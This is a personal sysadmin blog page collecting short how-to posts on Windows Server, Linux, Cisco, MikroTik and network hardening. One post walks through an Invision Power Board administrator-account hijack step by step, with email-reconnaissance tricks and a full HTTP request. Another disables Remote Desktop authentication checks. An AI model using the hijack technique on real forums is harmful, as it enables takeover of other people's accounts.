Windows Server 2012 R2 & HP Proliant Microserver

Windows Server 2012 R2 hangs on 'Getting devices ready 84%'
Fails to Complete the installation on HP MicroServer Gen7 (N36L, N40L & N54L)

The MicroServer N36, N40L and N54L all share the same embedded NC107i PCI Express gigabit NIC. The NC107i uses the Broadcom BCM5723 chip which doesn’t have an updated driver included with the Server 2012 R2 installation media. The lack of drivers will get you stuck at 84%...

The current workaround is to disable the on-board NIC and install another card.
Flash the custom BIOS to unlock the hidden BIOS screens
Install a supported NIC in the PCIe slot (Joe used the Intel EXPI9301CTBLK
Go into the BIOS and change the settings to match
Boot Settings -> Embedded NIC Port 1 Control – [Disabled]
Boot Settings -> Wake-On LAN – [Disabled]
Chipset -> Atheros AR8132M NIC – [Disabled]
After a reboot, Server 2012 R2 should install fine.

Fall back to R1 or...., here's a solution for you!

Download this driver and add it to the $WinPEDriver$ folder of your media installation kit.
Disable Embedded NIC Port 1 Control in BIOS
Install Windows Server 2012 R2
Add a Server name
Reboot into BIOS to Enable the NIC
This should get you working, have fun!

HP have documented this as a known issue and are currently working with Microsoft to resolve prior to the official release of R2.

Read more →

Global Smartphone Sales

CouponAudit infographic.

This Infographic is produced by Coupon Audit (provides Zappos coupon code) and VoovodeNET
<br /> <br /> <br /><br /> <br /> <img style="max-width: 100%;" src="http://www.couponaudit.com/blog/wp-content/uploads/2013/11/Global-Smartphone-Sales7.jpg" alt="Global Smartphone Sales" /></p> <br /> <p> </a></p> <br /> <p> This Infographic is produced by <a href="http://www.couponaudit.com/coupons/zappos">Coupon Audit (provides Zappos coupon code) </a> and <a href="http://www.voovode.net">Voovode</a> </p> .<br /><br /> <br />

Read more →

ITProDevConnections 2013

ITProDevConnections

It's time to attend a conference this weekend all about technology with my friend nick.

I`ll possibly stick to the networking & security area again as every year....

Hope it's gonna be good! See you on monday!

Read more →

Administer samba shares via SWAT

Is it hard for you to play with smb.conf and other stuff? Are you afraid of doing any mistakes?

Then you have to think about using swat, the samba web administration tool.

We will first install samba, cifs-utils, swat and xinted, all needed for our SWAT installation.

sudo apt-get install samba cifs-utils swat xinetd

Then we will go ahead and enable swat in our internet service deamon,

sudo update-inetd --enable 'swat'
sudo dpkg-reconfigure xinetd

after xinetd, we will create the swat service.

sudo cat > /etc/xinetd.d/swat <<-EOF
service swat
{
port = 901
socket_type = stream
wait = no
user = root
server = /usr/sbin/swat
log_on_failure += USERID
disable = no
}
EOF

SWAT needs to have access to the smb.conf file to edit it automatically. We will now give those permissions and restart the xinetd service:

sudo chmod g+w /etc/samba/smb.conf
sudo chgrp adm /etc/samba/smb.conf
sudo service xinetd restart

By now you should be able to login to the administration tool via http://localhost:901/
Start sharing!

Read more →

How to generate entropy in few easy steps

You will possibly need this for a PGP key.. So how to generate entropy through a secure shell connection in an easy way?

You don`t have to smash the keyboard or move the mouse and stuff...

Install haveged, a simple entropy deamon.

apt-get install haveged

then type in -w with your bits:

haveged -w 4096

Now you can re-start your PGP-key entropy gatherer in order to finish quickly, right after it's done, you might consider removing haveged as i did.

apt-get remove haveged

Easy eh?

Read more →

Disable Automatic Private IP Addressing - APIPA

APIPA is Enabled

APIPA sometimes is tricky, giving us IPs in a range of 169.254.0.1 to 169.254.255.254
When a DHCP server fails, APIPA gives you an IP address. The client then verify that it's address is unique on the network by using ARP queries. Whenever a DHCP server sends the DHCPOffer packet, the clients requests a dhcp lease, thus leaving the APIPA addressing.

The best way to solve this is by heading to the registry editor and change a DWORD value to zero.

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameteres
IPAutoconfigurationEnabled: 0

Read more →

Transmission deamon - 409: Conflict - Invalid session-id header

How to solve?
Remove the default /web from your URL:

http://www.example.com/transmission/web

to

http://www.example.com/transmission

Read more →

HRESULT 0xc8000222 when trying to install any version of .netFramework

This will occur mostly on Windows 7, never happened on Windows 8: 'Installation Did Not Succeed' .NET Framework has not been installed because: HRESULT 0xc8000222

There is a common problem with windows update and the .netframework. We'll have to clean the SoftwareDistribution folder before we proceed.

Click Start and Run:

cmd

This will open the well known Command Prompt, then type:

net stop WuAuServ

This will stop the Windows Update service. Make sure you're the admin.
Click Start and Run again, this time type %windir% and press Enter.
Look for the SoftwareDistribution folder and rename it to SwDist.old.
Now go back to the Command Prompt and start the Windows Update.

net start WuAuServ

That was it. Re-run the netFramework and it should work.

Read more →

Watch live tasks running on remote pc

This will work only if you have pstools installed on both of computers.

@echo off
set /p comp=Type IP or HOSTNAME:
echo.
IF "%comp%"=="" GOTO Error
c:\pstools\pslist \\%comp% -s
echo.
pause
GOTO End
:Error
echo No IP inserted.
echo.
pause
:End

 Save it as batch file and run it.

Read more →

Image to disk and vice versa on unix

Backup all your usb drivers or your disk drivers, or clone them using dd, the ultimate tool.
We will first list all our available disks, watching out not making any mistake.

fdisk -l

Then after the output, notice the /dev/sdA or /dev/hdA or /dev/sdB etc, take a note on what device you want to take backup from, then think about the location of it going, like a folder or in another device.
if stands for input file.
of stands for output file.
By issueing the following command, we will backup our second drive into ~/.

dd if=/dev/sdb of=~/test.img

To restore it, simply swap /dev/sdb with ~/test.img, so simple!
You can also change the block size by using the bs command, eg:

dd if=/dev/sdb of=~/test.img bs=512 

Read more →

Vodaphone USB Broadband on Linux

What you will need:

1. usb-modeswitch-2.0.1.tar.bz2
2. usb_modeswitch-data
3. libusb-1.x

Right after you install those files on your linux box, append these three lines in a terminal:

usb_modeswitch -WD -v 12d1 -p 1526 -n -M 555342437f0000000002000080000a11062000000000000100000000000000 -I -w 500

modprobe option

echo "12d1 14cf" > /sys/bus/usb-serial/drivers/option1/new_id

Open your network manager window, select Mobile Broadband, create a new connection and for connection settings leave them as default, just set the password to 1234.

Plug-in your Vodafone USB and that's it !
                                                                                                                                           [Source]

Read more →

Disable ICMP ping responces on your linux box

Depends on the distribution you use you may be able to disable the ping responce in your box to add some complexity for the attackers or the 'bad guys'. In the video below i am going to show you how to append such configuration in your linux distro.

Disable ping reply

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

Enable ping reply

echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

To make this permanent set the following into /etc/sysctl.conf

net.ipv4.icmp_echo_ignore_all = 1

ICMP Message Types

You can find more about ICMP here.

Read more →

Tips on hardening an enterprise server system

Hardening a system is the process of making it more secure from the default configuration; it is a very important for servers. Before some time, security wasn't a primary concern, but with all the viruses and attacks on servers today, administrators need to consider about everything.

Keep the system updated

The risk of not being up to date is huge in the world we live on. Hundreds of vulnerabilities are being discovered day by day by security experts you should be aware of. It doesn't matter if your anti-virus is special or your firewall is wicked sick, trust me, for a hacker it's not a big deal to write some bof and win.

Follow the updates regularly and don't miss a thing, patch every hole. In windows world you may use WSUS feature in your server to serve updates to your network clients, this will save bandwidth in the network and save you before some unwanted patching.

Minimize the threat

A server should be installed only for the exact needs, if you're dealing with a server which you obviously don`t know what goes in and out, you're finished. Only the required services and protocols should work fine, rest should be disabled or removed. If you're working on windows environment, make sure to use group policy and the security configuration wizard to help you.

1. Use DMZ,.. demilitarization zone is a network added prior to the internal 'protected' network for extra security.
2. Use Firewalls, play your game and create your own rules in order to win. Policy-based filtering, iptables etc.

This tool should help your windows computers.

Read more →

Enable TCP SYN cookie protection on your linux server

Normally when a client attempts to start a TCP connection to a server, the client and server exchange a series of messages which normally runs like this:

1. The client requests a connection by sending a SYN (synchronize) message to the server.
2. The server acknowledges this request by sending SYN-ACK back to the client.
3. The client responds with an ACK, and the connection is established.

This is called the TCP three-way handshake, and is the foundation for every connection established using the TCP protocol.

A SYN flood attack works by not responding to the server with the expected ACK code. The malicious client can either simply not send the expected ACK, or by spoofing the source IP address in the SYN, causing the server to send the SYN-ACK to a falsified IP address - which will not send an ACK because it "knows" that it never sent a SYN.

The server will wait for the acknowledgement for some time, as simple network congestion could also be the cause of the missing ACK, but in an attack increasingly large numbers of half-open connectionswill bind resources on the server until no new connections can be made, resulting in a denial of service to legitimate traffic. Some systems may also malfunction badly or even crash if other operating system functions are starved of resources in this way.

The protection should be enabled by default in many distros.

Commands used:

sysctl -n net.ipv4.tcp_syncookies
nano /etc/sysctl.conf
sysctl -p

Read more →

VLANs vs Subnetting

Subnet
is a range of IP addresses determined by part of an address (often called the network address) and a subnet mask (netmask). For example, if the netmask is 255.255.255.0 (or /24 for short), and the network address is 192.168.10.0, then that defines a range of IP addresses 192.168.10.0 through 192.168.10.255. Shorthand for writing that is 192.168.10.0/24, 255 is for the broadcast and 0 is for the network address.

VLAN
A good way to think of this is "switch partitioning." Let's say you have an 8 port switch that is VLAN-able. You can assign 4 ports to one VLAN (say VLAN 1) and 4 ports to another VLAN (say VLAN 2). VLAN 1 won't see any of VLAN 2's traffic and vice versa, logically, you now have two separate switches. Normally on a switch, if the switch hasn't seen a MAC address it will "flood" the traffic to all other ports. VLANs prevent this.

If two computers are going to talk using TCP/IP, then one of two conditions must be met:

They must belong to the same subnet. This means the network address must be the same and the netmask must be equal or smaller. So, a computer with an interface with an IP address of 192.168.10.4/24 can talk to a computer with an interface with an IP address of 192.168.10.8/24 with no issues, provided they are both connected to the same physical switch or VLAN. If the second computer's interface connected to that same physical switch or VLAN was 192.168.11.8/24, it would ignore the traffic (unless the interface was in promiscuous mode).

A router needs to exist between both computers that can forward traffic between subnets. Computer A and computer B need a route (or default gateway) to this router. Let's say a computer with an interface with an IP address of 192.168.10.4/24 wants to talk to a computer with an interface with an IP address of 192.168.20.4/24. Different subnets, so we must go through a router. Let's say there's a router with two interfaces (routers by definition have two interfaces), one on 192.168.10.254/24 and 192.168.20.254/24. If the route table or DHCP is setup correctly and both computer A and B can reach the router's interfaces on their respective subnets, then they can talk to each other indirectly via the router.

Forcing traffic to go through a router, even though it's not needed such as on our 8-port switch above, has security and performance benefits - it gives you an opportunity to filter traffic, an opportunity to optimally route traffic based on type, and routers do not forward broadcast traffic (unless unusually configured). VLANs are sometimes used as a "hack" to manage flows/visibility of IPv4 broadcast traffic.

VLANs are equivalent to switches. What comes in 1 port of a VLAN is replicated("flooded") to all other ports unless the VLAN has seen/learned the MAC address before, then it is directed to that port. There is no gateway to the VLAN proper. A "gateway" always means the IP address of a router.

For VLAN 1 to talk to VLAN 2, an interface in VLAN 1 must be connected to a router, an interface in VLAN 2 must be connected to a router, and that router must be configured to forward traffic between those subnets. In our 8 port example above, if we wanted to route traffic between those VLANs, we'd have to spend 1 port on each VLAN connecting to a router. Same with a switch.

When a computer gets its IP via DHCP, it also usually gets the "default gateway" from that same DHCP server. Someone has to configure the DHCP server correctly. Routing protocols such as RIP, IS-IS, OSPF, and BGP can also add routes. Of course you have the option of adding static routes.

I'm sure many high-end switches/hardware have a "VLAN router" "built-in" to them where spending an extra port within each VLAN connecting it to a physical router really isn't necessary if you want to route between VLANs in the same switch. This might be where the VLAN IP or "gateway" comes into play.

Read more →

mesa-libgl and nvidia-libgl are in conflict error

pacman -Syu

and..

mesa-libgl and nvidia-libgl are in conflict, Remove nvidia-libgl? [y/N]

The following commands will fix it quickly:

pacman -Syu --ignore mesa-libgl
pacman -Sc
pacman -Rs xf86-video-ati
pacman -Rs ati-dri
pacman -S nvidia
pacman -Syu

Basically you update ignoring the mesa-libgl, then purge the pkg cache, remove xf86-video-ati which is 32bit ( maybe vmware would need that at the first place ), also ati-dri, then synchronize the nvidia drivers and do a full update.

Read more →

Cisco router - Reset config

Start putty & connect to the communication's port with the default rates etc....

Restart the cisco router in order to break the boot sequence of the router by tapping the Break key.

breaking the boot sequence...

After you broke the boot sequence, issue the following command:

confreg 0x2142

"You must reset or power cycle for new config to take effect" is what you will face after the proper usage of the above command, reset by giving this:

reset

issuing the reset command...

Now, after some time it should start booting.. It will ask you if you`d like to start from scratch.. say yes/no depending what you actually want to config.

[...] ~config taking place

After the configuration, you have to exit the NVRAM ignorance mode by issuing the commands below:

config-reg 0x2102

Exit config# using Ctrl+C and then:

wr mem
reload

Hint: If you would like not to reset the router's configuration - altering the password only is done through the same way but answering no to the 'start from scratch' dialogue, then by saving the running configuration giving the copy start run command at that time. For more info reply below.

Read more →

Installing a LAMP server

LAMP is a combination of free, open source software. The acronym LAMP refers to the first letters of Linux (operating system), Apache HTTP Server, MySQL (database software), and PHP, Perl or Python, principal components to build a viable general purpose web server.

Install Linux:
just kidding...

1. Install Apache:

sudo apt-get install apache2

After everything is finished, fire up a browser and type:

http://localhost/

you should see already a folder, if nothing is found then you have to re-install it. If you still can`t find a solution, drop a line below.
2. Install PHP:

sudo apt-get install php5 libapache2-mod-php5

After everything is finished, we have to restart apache to get notified about php:

sudo /etc/init.d/apache2 restart

3. Install MySQL:

sudo apt-get install mysql-server

Then get access to console by typing:

mysql -u root

And change your password:

mysql SET PASSWORD FOR 'root'@'localhost' = PASSWORD('P@$sw0rd');

After that, install PHPMyAdmin:

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

Edit php.ini to work with phpmyadmin...

gksudo gedit /etc/php5/apache2/php.ini

And change this line:

;extension=mysql.so to extension=mysql.so

Last thing is to restart apache to take care of MySQL too:

sudo /etc/init.d/apache2 restart

Go again at http://localhost and check what you've done!

Read more →

RDC authentication bypass

This is not a hack.

1. Open up a command prompt and type mstsc.exe.
   
2. Click on Options drop down menu to access advanced options about the connection.
   
3. Save the connection settings by clicking Save As..., somewhere in your desktop.
   
4. Right click this .rdp file now and open it using notepad
5. Find authentication level:i:2 and turn it into authentication level:i:0.
   
6. Add enablecredsspsupport:i:0 at the end of the text file.
   
7. Then, open the rdp file which we've just edited and connect to the remote computer.
8. If it asks you for a password, enter the password of your local user account.

done!

Read more →

Reduce MTU size to accept 802.1Q or ISL

InterSwitchLink and 802.1Q are two different protocols for trunks between network devices, though they cause some problems when they are not configured properly...

In order not to cause frame errors so packets can be accepted in the RX line, you have to reduce the MTU size if you are working with cheap equipment or non-cisco devices.

I wont explain the 'how-to' because devices vary, just a reminder :)

Read more →

Icon not displayed correctly? Rebuild the icon cache.

This will work for Windows Vista, 7 or 8.

This is the default location of icon cache database
C:\Users\User-Name\AppData\Local\IconCache.db

Fire up cmd as an Administrator and give the following commands by turn:

ie4uinit.exe -ClearIconCache
taskkill /IM explorer.exe /F
DEL "%localappdata%\IconCache.db" /A
shutdown /r /f /t 00

This will force the IconCache.db to rebuild. 

Read more →

Export - Import a DHCP database on a Windows Server

Moving to another server? Backing up a windows server? Here you go:

1.

netsh dhcp server export c:\dhcpbackup.txt all

2. do not create a new scope in the dialogue, we're restoring a backup, remember?

3. after you disable your old dhcp server:

4.

netsh dhcp server import c:\dhcpbackup.txt all

Problems found:
If:
"An Internal Error Occurred"
then:
delete the following entries inside the txt before restoring:

006 DNS Server
015 DNS Domain Name

Read more →

Control a windows service remotely

Too many standups moving inside a networking environment to control services on different windows machines. This post will show you how to control a service remotely.

Let's find out what's the name of the service which we're trying to control, to do so:

sc.exe \\HOSTNAME query

sc.exe is a service control application included in windows to control services in a remote computer.
The previous command will query the computer 'hostname' to show all of it's available services and statuses.

Now, it's time to control the service:

sc.exe \\HOSTNAME stop "NAMEOFSERVICE"

The full available control commands are available at "sc.exe /?"

Read more →

NSS Labs tested 5 top browsers vs malware

As the first line of defense against malware infection, browsers must provide a strong layer of protection. NSS tested the effectiveness of five leading web browsers against 754 samples of real-world malicious software, and the results show significantly differing protection capabilities.

Source

Read more →

Unable to connect to network - Rebuild the TCP/IP stack

There's a bug when you just connect to a network but no packets are sent, nothing is happening, you havent got an IP address and nothing seems to be working... is the NIC broken? Check below how to fully reset the TCP/IP stack in order to get some things working back again:

1. Go SafeMode & Networking.
2. Delete these keys from regedit:

HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Winsock
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Winsock2

1. Open the nettcpip.inf file in your %winroot%/inf folder
   (%winroot% is usually c:/windows).
2. Find the [MS_TCPIP.PrimaryInstall] section. Change the Characteristics value from 0xA0 to 0x80.
3. Open the properties of the network connection you want to fix. In the General tab, click on the Install button. Click on the Have Disk button, and point the location to %winroot%/inf. After that select TCP/IPv4.
4. Now you are able to uninstall TCP/IP, do it and reboot.
5. Go back to your network connection, and install TCP/IP again & reboot, things must be working now.
6. Open cmd and type the last thing to reset the txtlog:

netsh int ip reset resetlog.txt

Are you connected now? :)

Read more →

IPB all version - administrator account hijacking

Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free. In addition, many groups offer the download or design of free and paid skins.

• Required data:

        1) Administrator's login name
The admin login is easily found by clicking on "The moderating Team" link on recent IPB's footer, or using the URL below: index.php?app=forums&module=extras§ion=stats&do=leaders

        2) Administrator's e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way to get it. The attacker can get it through:
     - using whois on domain.tld to get registrar informations
     - looking up a prospective e-mail on Facebook and see if a matching profile shows up
     - using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum, etc comments based on user e-mail address). Attacker can create a script to retrieve an email based on an avatar. For example mine is: http://www.john-jean.com/gravapwnd.php?zboob=john@wargan.com
     - do sourcing using FB, G+, Twitter, Google SERP, ...
     - use SE methods, such as faked e-mail catcher; or use XSSs on known websites consulted by the target.

• Exploitation:

Previously, on this adviso: we saw that $email is not rejected if it contains spurious whitespace, and that $member_key & $v length is not checked. We also saw some MySQL use-cases. Let's see how we can exploit that:

The e-mail field from the `members` table in IPB is declared as a varchar(150).
Upon registration, we fill the mail member (or admin) for which we want to steal the account to which we add a padding space for the size of the string exceeds 150. Then we add any character after the space one. It is necessary to bypass ajax's validator, feel free to use Burp Suite or Tamperdata.

For example:
Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com                                                                                                                                       AAAA'

The SELECT query checking existing e-mails will not yield any result:
SELECT * FROM members WHERE email='admin@admin.com                                                                                                                                       AAAA'

The new account is successfully created. Our account is now using the e-mail address below:
'admin@admin.com                                                                                                                                       '
AAAA has been deleted by MySQL: string exceeding 150 characters are truncated.

At this stage, we have two users with very similar e-mail addresses:
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com                                                                                                                                       '

POST HTTP request looks like (on registration page):

************************ BEGIN OF CODE ************************
POST /~codereview/IPB/index.php?app=core&module=global§ion=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=global§ion=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466

termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offset=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com            A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_VuvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOmEG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&recaptcha_response_field=mmotlyiinducted&agree_tos=1
************************* END OF CODE ***************************

We now can change our password. The profile corresponding to our session's e-mail will be used. As already stated, spaces are not taken in consideration. The query will thus actually return the first matching e-mail result: the real administrator account. We will have actually changed the password of the administrator profile.

This flaw is usable both on the registration page and on the user control panel (index.php?app=core&module=usercp&tab=core&area=email).
Have fun :)

Read more →

How-to remotely enable RDC in a LAN

Are you an administrator of a network who`d like to sit in his chair a bit longer without the disturbing movements inside that place? How about working remotely without effort? heh, enable Remote Desktop in this LAN easily:

1. Log into a windows machine as an Administrator and start Registry Editor.
2. Click on File menu and choose Connect to Network Registry.
3. Type the host name of the remote computer or browse computers over the network by clicking “Advanced” button, then click ok.
4. Find HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server.
5. Find fDenyTSConnection, 1 = disabled, 0 = enabled, choose wisely :)
6. You have turned RDP on in the remote machine.

There's also another, faster method:

reg add "\\COMPUTERNAME\hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0r

Change the underlined COMPUTERNAME with the target network computer, hf.

Read more →

Mikrotik DynDNS configuration how-to

Mikrotik is so powerful but unfortunately it doesn't support dynamic DNS service without using a script...
I had to create a full new config before some days so i was searching for the DDNS option but couldn`t find a thing.

So after our dear friend google there seems to be a script to bypass this limit:

# Set needed variables
:local username "yourusername"
:local password "yourpassword"
:local hostname "yourdyndnsorgname.dyndns.org"
:global systemname [/system identity get name]

:if ($systemname = "Site1" ) do= {
:set hostname "yourdomain1.dyndns.org"
}
:if ($systemname = "Site2" ) do= {
:set hostname "yourdomain2.dyndns.org"
}
:if ($systemname = "Site3" ) do= {
:set hostname "yourdomain3.dyndns.org"
}

:global dyndnsForce
:global previousIP

# print some debug info
:log info ("UpdateDynDNS: username = $username")
:log info ("UpdateDynDNS: password = $password")
:log info ("UpdateDynDNS: hostname = $hostname")
:log info ("UpdateDynDNS: previousIP = $previousIP")

# get the current IP address from the internet (in case of double-nat)
/tool fetch mode=http address="checkip.dyndns.org" src-path="/" dst-path="/dyndns.checkip.html"
:local result [/file get dyndns.checkip.html contents]

# parse the current IP result
:local resultLen [:len $result]
:local startLoc [:find $result ": " -1]
:set startLoc ($startLoc + 2)
:local endLoc [:find $result "" -1]
:local currentIP [:pick $result $startLoc $endLoc]
:log info "UpdateDynDNS: currentIP = $currentIP"

# Remove the # on next line to force an update every single time - useful for debugging,
# but you could end up getting blacklisted by DynDNS!

#:set dyndnsForce true

# Determine if dyndns update is needed
# more dyndns updater request details available at http://www.dyndns.com/developers/specs/syntax.html
:if (($currentIP != $previousIP) || ($dyndnsForce = true)) do={
:set dyndnsForce false
:set previousIP $currentIP
/tool fetch user=$username password=$password mode=http address="members.dyndns.org" \
src-path="/nic/update?hostname=$hostname&myip=$currentIP" dst-path="/dyndns.txt"
:local result [/file get dyndns.txt contents]
:log info ("UpdateDynDNS: Dyndns update needed")
:log info ("UpdateDynDNS: Dyndns Update Result: ".$result)
:put ("Dyndns Update Result: ".$result)
} else={
:log info ("UpdateDynDNS: No dyndns update needed")
}

After we save the script, we have to add a new scheduled job in the event which we just made with an interval of.. let's say... 15 minutes?

Now you can 'remote access' easily.

Read more →

Kali linux - No action for laptop lid

So i was trying to figure out the actions of my laptop's lid without going in a deep mode terminal way again..., after a long search nothing seemed to be working..., tried several tools but none of them were actually changing the action of the lid.

So after some days i came accross the gnome-tweak-tool which i've already used in the past and now turns out to be really helpful...

apt-get install gnome-tweak-tool | gnome-tweak-tool

Under Shell you should be able to find:
'Laptop lid close action on battery'
'Laptop lid close action when on AC'

Again, this is a bug found in some hardware, if you haven't found the option in the menu then try this.

Read more →

Useful console commands for Windows

Here is a list of console commands for almost any version of Windows:

Accessibility Options: access.cpl
Add Hardware: hdwwiz.cpl
Add / Remove Programs: appwiz.cpl
Administrative Tools: control admintools
Automatic Updates: wuaucpl.cpl
Wizard file transfer Bluethooth: fsquirt
Calculator: calc
Certificate Manager: certmgr.msc
Character: charmap
Checking disk: chkdsk
Manager of the album (clipboard): clipbrd
Command Prompt: cmd
Service components (DCOM): dcomcnfg
Computer Management: compmgmt.msc
DDE active sharing: ddeshare
Device Manager: devmgmt.msc
DirectX Control Panel (if installed): directx.cpl
DirectX Diagnostic Utility: dxdiag
Disk Cleanup: cleanmgr
Disk Defragmenter: dfrg.msc
Disk Management: diskmgmt.msc
Partition manager: diskpart
Display Properties: control desktop
Properties of the display (2): desk.cpl
Properties display (tab "appearance"): control color
Manager vérirficateur drivers: check
Event Viewer: eventvwr.msc
Verification of signatures of files: sigverif
Findfast (if present): findfast.cpl
Folder Options: control folders
Fonts (fonts): control fonts
Fonts folder windows: fonts
Group Policy: gpedit.msc
Internet Properties : inetcpl.cpl
IP Configuration: ipconfig
Keyboard Properties: control keyboard
Local Security Settings: secpol.msc
Local Users and Groups: lusrmgr.msc
Logout: logoff
Properties of the mouse: main.cpl // control mouse
Network Connections: ncpa.cpl
Notepad : notepad
Screen Keyboard: osk
Monitor performance: perfmon.msc
Power Options: powercfg.cpl
Printers and Faxes: control printers
Regional and Language Options: intl.cpl
Editor of the registry: regedit
Remote desktop connection: mstsc
Security Center: wscui.cpl
Console management services: services.msc
Shared folders: fsmgmt.msc
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now): sfc /scannow
SFC (Scan next startup): sfc /scanonce
SFC (Scan each démarraget): sfc /scanboot
SFC (back to default settings): sfc /revert
SFC (purge cache files): sfc /purgecache
SFC (define size CAHC x): sfc /cachesize = x
System Properties: sysdm.cpl
Task Manager: taskmgr
Telnet client: telnet
Windows firewall: firewall.cpl
Windows Management Infrastructure: wmimgmt.msc
Protection of the accounts database: syskey
Date and Time Properties: timedate.cpl

Commands for scripting or fast editing some pesky things... hf.

Read more →

Backup - Restore MySQL databases easily

As an IT there should be enough computers running MySQL which you would like to take care or maybe advantage easier than just looking around the fs without idea...
Let's say you hack into a system and all you do is their database! Hah, i am kiding, though, we would like to backup this database for security reasons.... How's the fast way? or How can we do this in a script?


Below are some commands that may be handy from time to time for those who doesn't already know..


Backup MySQL Database

# mysqldump -u(username) –p(password) (databasename) > (dumpfile.sql)

Backup all MySQL Databases

# mysqldump -u(username) –p(password) --all-databases > (dumpfile.sql)

Backup a Remote MySQL Database

 # mysqldump -h(hostip) -u(username) –p(password) (databasename) > (dumpfile.sql)

Restore MySQL Database

# mysql -u(username) –p(password) (databasename) < (dumpfile.sql)

Restore a database that already exist on the target machine

# mysqlimport -u(username) –p(password) (databasename) < (dumpfile.sql)

Read more →

Five reasons you should never work as an IT for free

We've all done it. A friend, a neighbor, a relative, a good client, a bad client, a pretty girl... Whoever it was, and for whatever reason, we all threw them a technological bone and fixed something for free. In rare instances, it can be a rewarding experience. Perhaps your buddy gave you a beer. Maybe someone said thank you. Maybe there was a smile on their face, and that was rewarding enough.

More likely, however, that five minute task you thought you were signing up for turned into 40 minutes, then an hour, then a commitment. Wow. You didn't see that coming.


You Break it You Bought it.
When you sit down to fix a problem that presented as a simple one you are creating a contract. Not a legal contract, but a social one. The computer owner is trusting their computer with you. It's their baby, and you're the doctor. So you sit down, and begin to fix a problem.
In the process, something else breaks. You fixed one thing, but something else goes awry. What's the best part? Neither you nor the user notice it is broken until a day later when they call you to blame you for breaking something else.
"I thought you were going to fix it." They complain.
This is the primary reason you charge money to fix something. You break it, you bought it. The user / owner will expect you to warranty your service even though THEY received all the value of your time, and you received nothing in exchange.

People don't respect things that are free.
I learned that quote from a man who runs a non-profit organization. Image that. A man who solicits donations for a living candidly told me "people don't respect things that are free." You know what? He's right. Free advice. Free upgrade. Free entry. None are valued. Free advice is seldom wanted. Free upgrade was something you were going to get anyway. Free entry? The band playing tonight must not be any good. People associate the value of service with the amount of money that is exchanged for it. How else do you think that lawyer can get away with charging $400 an hour? People naturally make the assumption that if it costs an arm and a leg, then it must be worth it. So, if customers and friends will assume that the most expensive car is the best one, what will they assume of the free car? Do you want the heart surgeon who charges $500,000 per surgery or the one who works for beer to operate on your mother?

They will expect it forever.
In law, the concept of a precedent is vitally important. Judges and lawyers look to previous cases to decide what the interpretation of the law was because if a case was settled one way before, chances are, it will be settled that way again.Gamblers playing craps look at the past behavior of the dice to, mistakenly, assume that the good luck will continue. Users will figure if you fixed it once for free, you'll do it forever for free. There is no reason why they should respect the thousands of hours you have spent learning and researching the art of computer science. There is no reason that they should respect the certifications you hold. There is no reason that they should honor your abilities by paying your fees. Why? Because you did it for free. Once!
When they come back and you try to get fees, they will meet you with resistance in the form of guilt. "I thought we were friends" they cry. "You didn't charge me anything last time." They argue.
Setup the expectation that they are going to pay (or barter) from the onset. Demand the respect that you deserve. Make sure they understand you are a professional. After all, that is the difference between a professional and an amateur. Professionals get compensated for their skills.

The demands will only grow with time.
Give them an inch, and they will take you through three operating system upgrades, two virus infections, and a crashed hard drive. Once you've set the precedent and created the expectation that you are their knight in shining armor, they will begin to call you for everything. They will suck up your time and resources. They will not be grateful. They will involve you in 30 minute hypothetical conversations then disagree with your expertise.

It Weakens Your Backbone
Working for free is not only unprofitable, it weakens your constitution as a professional consultant. For many consultants, asking for money is difficult. They email out a silent invoice after the fact and hope they get paid. This practice can lead to unbalanced books, debt, and a going out of business sign. The simple fact is: if you don't ask for your money, you're not going to get paid. No one just hands out checks. Setting up the expectation, especially when you fix a computer for the first time for a client, is vitally important in establishing boundaries that ensure you are paid in a timely fashion. Working for free, throwing out freebies, "comp"-ing your time hurts your ability to ask for the sale. It hurts your credibility because the client will assume that if you're not charging them for a given task, you didn't know what you were doing or you made mistakes.
It may give you butterflies, but ask for the money. Do it openly and notoriously. Your clients will take it as a sign of confidence.

Taken from http://www.experts-exchange.com/ .

Read more →

Looking for Windows Explorer tabs? Then use this

Clover is an extension of the Windows Explorer, to add multi-tab functionality similar to Google Chrome browser. After install Clover, you will be able to open multiple folders within the same window, and you can also add folder bookmarks.

Clover can work either in XP, 7 or 8.

Convenient Tab page
Just remember that Ctrl + T to open the page, and Ctrl + W to close the page, Ctrl + Tab to switch pages, the work efficiency far more than doubled!

Seamless integration with operating system
Clover as a BHO plug-in, integrated into Windows Explorer, to keep your usual habits, without having to learn new software operation, and immediately you can use.

Lightning-fast bookmarks bar
